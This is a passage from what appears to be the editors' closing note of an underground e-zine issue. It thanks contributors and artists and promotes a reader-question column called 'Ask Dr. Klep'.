Digital Avatar for both their continued support. Thank You Guys. Ethercat has always been willing to help and much thanks go out to her for putting up with all our wild ideas... rOTTEN was the Original ASCII artist and for this issue we decided we needed a change. The new art is done by an anonymous author, but thanks go out to carsten_bund@mediacube.de. Also we recently got our first contribution of Digital Art to the Gallery section of the site, thanks go out to Michael Perryman. Kleptic has his now regular column 'Ask Dr. Klep' and we thought the name would be enough to inspire questions but obviously not. Kleptic, Klep to his friends, is a very well rounded underground figure and is willing to answer all your questions, even the ones your parents would never answer growing up. So mail him your deep underground questions and he'll sort you with an answer... So till next time Folks. Same Discordant Time, Same Discordant Channel. 'Be Safe, don't get caught with your pants down...' - President William Clinton. The Editors.